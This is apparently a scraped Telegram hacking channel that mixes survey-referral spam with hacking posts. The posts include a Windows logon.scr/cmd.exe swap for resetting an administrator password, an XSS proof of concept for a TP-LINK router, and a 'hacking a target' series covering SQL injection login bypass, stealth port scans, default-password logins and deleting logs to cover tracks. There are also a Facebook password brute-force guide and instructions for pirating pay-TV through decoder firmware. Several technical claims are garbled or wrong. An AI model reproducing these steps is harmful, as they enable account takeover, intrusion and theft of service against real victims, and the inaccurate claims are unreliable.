Tech Byte
4.77K subscribers
254 photos
3 videos
87 files
192 links
Tech tricks, news, hacking tutorials and dark web guides.

Admin : @anonyguy
Download Telegram
Forwarded from RL channels
Earn money online by completing a few short surveys. Withdraw when you get $20 to your PayPal or as Air Miles.

Use the link below to get $1 upon sign-up.

https://legerweb.com/1VPCRA
#INCLUDE<TYPES.H>
some of you guys contact me on how to hack apps
i am not a reverse engineer
there are many types of hackers but what we do here is called penetration testing
the main types of hacking are
cryptologists break encryption protocols
pentesters infiltrate remote servers and retrieve files
forensics are concerned with the recovery of data and how computer crimes take place
binary exploiters use buffer overflows and heap spraying to execute code and gain acess to servers [this is different from how pentesters do it]
reverse engineers hack hardware and software
they hack games and create crack software
reverse engineers are very dangerous
for example they can use sound waves to hack your pc etc.
social engineers hack the human mind
instead of these hackers to sit behind a computer, they trick people into giving their passwords
this is where phishiing comes from
phreakers get free internet and calls
this is where ss7 comes from
now you can choose what type of hacker you want to be
~halo
how can upgrade ur phone version, from 5.1 to ... 1. OTA ( over the air update). If you are using google products like nexus, you can update everytime new version pops up. Other manufacturers, provide upto 2 latest updates.

Go to system>about phone> updates

2. If your system manufacturer isn't providing new updates anymore, you can check the custom roms, for your device.

3. If you can't find any custom roms too, you can create your rom for your device using the google opensource code.

Note: Sometimes its better to leave the device as it is, and get a new device altogether.
how to hack admin password using guest account💻

👉open cmd
:cd\windows\system32(hit enter)
mkdir newpass(hit enter)
copy logon.scr newpass\logon.scr(hit enter)
copy cmd.exe newpass\cmd.exe (hit enter)
del logon.scr(hit enter)
rename cmd.exe logon.scr (hit enter)
net user administratorname password (hit enter)

@Techbyte
Beware of Shopping Scams on the Web
I have been seeing Hacking: The Art of Exploitation, 2nd Edition Book(with free shippin to Ethiopia) on the Web. I recently encountered three different vendors on Amazon and Yahoo Shopping who wanted me to pay for items using Western Union or Moneygram. The Web vendors appeared to be legitimate US businesses but it turns out they wanted the cash payment sent to an international address.

The Amazon Marketplace and Yahoo Shopping do have certain guarantees for consumers but only if you pay using their credit card method.

I know no one reading this would succumb to a scam like this but if you have a friend or relative who isn't Web/ business savvy you might want to remind them to only pay for items using a credit card and make sure the vendor is legit. I also try to make sure I also have a valid business phone number and address before buying an item on the Web. Never send cash, especially to an international address.
Note-this Channel i can say is one of the best groups for learning hacking on Telegram
if you are new, read the older posts before asking me new questions. most of your questions have already been explained if its new ask me @anonyguy
Forwarded from RL channels
Earn money online by completing a few short surveys. Withdraw when you get $20 to your PayPal or as Air Miles.

Use the link below to get $1 upon sign-up.

https://legerweb.com/1VPCRA
Exploit Title: XSS Vuln - TP-LINK TL-WR740N Exploit Author: bl00dy# Tested on: Windows 8.1

Cross-site scripting (XSS) in TP-LINK TL-WR740N

__________________________________________________

Proof of Concept:

1. Go to your wireless router ip (ex. 192.168.0.1)

2. Go to Wireless and -Wireless MAC Filtering- tab

3. Click Add new button

5.Write random MAC Address and in -Description- write (<h1>XSS by
bl00dy</h1>)

6.Click save and you will see XSS in Wireless MAC Filtering tab
How to Log in xp without password

1.start computer
2.when it asks for password press ctrl+ alt + delete key twice
3.now another window opens asking for password.....
4. In this at the place of user name just type administrator...leave the password feild blank and hit enter
WANT TO USE FACEBOOK FOR FREE?
This is what you do.
we will use its sub domain hosted on the same server of 0.Facebook.com
and will open Facebook for free.
>it not works for Ethio Telecom and some other ISPs.
If 0.facebook.com not works on your telecom then inbox me(@anonyguy)I will give you other web address.
Have you Ever asked yourself whether it was possible to Unlock ZUKU,StarTimes, GoTV Decoders,Bamba tv or any other digital decoder/digital tv to Watch some Premium DStv Channels Free eg supersport 7,MTV Base,Discoveries,ss3 etc ? . The free to air channels are, genuinely speaking, not worth the time. Lucky for you, there is a way you can watch these premium channels on your current Gotv, Startimes or any other digital decoder or digital tv for absolutely nothing. The secret to achieving this is hidden, not really hidden, in the DTB firmware .


DTB Firmware For Decoders
DTB firmware has the ability to grant you access to the premium channels on your decoder and some of these channels are also available on DSTV. It is like installing a new software on your decoder such that your original service provider won’t catch you ‘stealing.’ Download the DTB firmware onto your Computer or Phone extract the zip folder then transfer the .bin file in it to either your flash disk or memory card. It will be only a few megabytes large thus even a small capacity storage stick will do the trick.

Requirements to Flash the DTB firmware on your Decoder
To flash the firmware on your decoder, there are a few pre-requisites. Your decoder needs to have the USB port or the memory card slot. You then need the DTB firmware downloaded above, a few remote using skills and you are all set to go premium on your decoder for free.


Unlock Digital TVs and Decoders
Follow this procedure to Unlock StarTimes and GoTV Decoders.With the memory stick or flash drive in the decoder and the decoder turned on, grab the remote and go to the settings. Go to the upgrade section and choose the USB option. Confirm that indeed you want to make the upgrade from the USB storage. The upgrade process will begin. After a few minutes, it will be complete. If you are worried about the new upgrade, be sure that you are free to restore the decoder to its factory settings anytime you feel like you wanna continue paying

Completing the Upgrade of Your Decoder
When the decoder notifies you of the completion of the upgrade, turn it off then on again. After that, do an automatic scan of the channels. You will notice that you are not prohibited from viewing any channel. Just like that, you’ve saved yourself lots of monthly payments for the premium channels on your GoTv, Startimes and other digital decoders. This method can also enable access to premium channels on digital tv.


This method had previously required the use of a different decoder altogether but it is now the simplest it can get. This article is meant for educational purposes only, do proceed with caution. Remember you can still reset your TV or decoder back to its initial
Credit for ETH hackers
how to modify user agent in mozilla without any Extension1- Type about:config into Firefox’s address bar and press Enter.

2- Type useragent into the search box. We’re looking for the general.useragent.overridepreference, If it doesn’t exist on your system.

3- Create a new preference, right-click on the about:config page, point to New, and select String.

4- Name the preference general.useragent.override

5- Enter your desired user agent as the value of the preference. For example:

Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36

To revert Firefox to the default user agent, right-click the “general.useragent.override” preference and select Reset.
HACKING A TARGET PART 1
RECON means gathering information about our target
open cmd or bash
the imaginary site we are hacking is m.co
type
nslookup m.co
you will see something like this
files.m.co 1.1.2.1
login.m.co 54.19.8.35
the numbers stand for the ip address
login.m.co looks interesting
so lets open our favorite browser and go to m.co
now lets imagine we see a login page
lets test if its vulnerable to sql injection
user: ' OR 1=1
pass: ' OR 1=1
if our site is vulnerable, we will see that we will login straight into the admin account
or we can do cookie injection(later)
[for linux]
lets scan the site for open ports
su root
and type your password
apt-get install nmap
after its done, type
nmap -sS login.m.co -o
this command will show the open ports of the site which we will use to attack
the -sS tells nmap to do a stealth scan so we cant be track
the -o lets us know the operating system
remember that if port1433 is open it means there is a database on the server
lets meet again
~halo zorayo
@TechByte
HACKING A TARGET PART 2
from my previous tutorial, we used nmap to find the open ports in the site.
the more ports a site has open, the more vulnerable it is because it has more doors for us to enter through
a honeypot is a special computer made with a lot of open ports so that hackers will be tricked into hacking it. if you get a site with 5 or more ports open, stop the hack!
now our next problem is to check if port 25 [email] is open. if after running nmap, you see it open, then the site is hosted by the company else you have to search elsewhere
now we use netcat to connect to each of the ports we found open
so if we found port 23 open, then we type
ncat login.m.co 23
if you are using windows, then open a browser and type
login.m.co:23
if you are asked for a password try
user: admin
or
user: root
and
pass: pass
or
pass: password
don worry if the password is wrong
i will talk about that in the next post
keep reading!
~halo zorayo
@TechByte
HACKING A TARGET PART3
in my last posts we talked about connecting to open ports with a browser and nmap
today we will look at how to log in with default passwords
a lot of companies purchase i.t equipments like modems and servers but they don change the passwords mostly because of laziness
the list of default passwords can be found on google
you will be shocked to see how many people use default passwords
if you didnt find the password, then you will have to use a brute force or dictionary attack to find the password
now that we have used the password to log into the site, we have to know whether we are root so that we have full access to the system
in the netcat shell or the browser, type
whoami
if you see root or NT/AUTHORITY then you are 99% done
if not, you have to use a privilege escalation exploit to become root
use the cd and ls commands to fool around and find sensitive data on the server
now lets cover our tracks
cd ~/var/log/
rm *
done!
more hacking is coming your way
~halo
As a part of our Hacking from Scratch scheme, total of 250 tasks will be published. These tasks includes books on hacking, sites to hack, sites to break into, articles on hacking tools, and everything, that one needs to become a hacker.
The tasks will start from super easy difficulty and become more and more difficult on further tasks. Around task 150+, the tasks will get time consuming and difficult, and at tasks 200+ the difficulty level will get around super hard level.
The resources will be provided to all of you Freely,and upon the completion of first task, second task will be given.
Upon completion of all 250 tasks, the learner will be skilled enough to complete all the hacking or IT related examinations with ease and along with latest tech knowledge, and training under one of the elite hackers ( we will guide them), gain title of elite in few years ( at most).
To start this Task we need atleast 2500 new members should be added/increased in this channel so we will able to share for over 15000Persons all over the world> the course will given by Kasahun(Zain Shahbhat),jack,Johnny;
Share Us @TechByte
**Happy New Year** For All of our Ethiopian Followers;Love You
Apple reveals 3 iPhone X models in their event at Cupertino.

iPhone XS - starting at $999
iPhone XS Max - starting at $1099
iPhone XR - starting at $699
Hack Facebook Account Password Using Brute Force

1⃣. First lets know something about Brute force attacks, “A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN).


2⃣. In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.”


But, In our case I’ll be using a Python script and a Long Dictionary Of passwords.


Requirement

A Kali Machine / Or Any Python Engine Will work!
Facebook.py ( v1 or v2 )
A FaceBook id
CrackStation Word List!

STEPS


Step 1. Install Python-mechanize using command mention below
~#apt-get install python-mechanize


Step 2. Add facebook.py using the command below
~# chmod +x facebook.py [*]
~# python facebook.py


Step 3. Now enter |Email| or |Phone number| or |Profile ID number| or |Username| of the victim,


Step 4. Now Give The "Path" Of Your CrackStation Word list


Step 5. Now it will try all passwords present in the word list, So relax as it will take time depending on speed of your processor and password strength of your victim!
Any Question @anonyguy
Join Us @Techbyte
For any adverisment contact @roml3n
ethical hacking tutorials will go simultaneously.More topics will be added as the series goes on.
Starting tomorrow, we will start fundamentals of hacking, and ethical hacking (step-by-step) series will start following it.
With that, all members are requested to participate in the event to fulfill the (100k+ learners in three months) target, by forwarding our posts for new members in your channel or group chat.
~Admin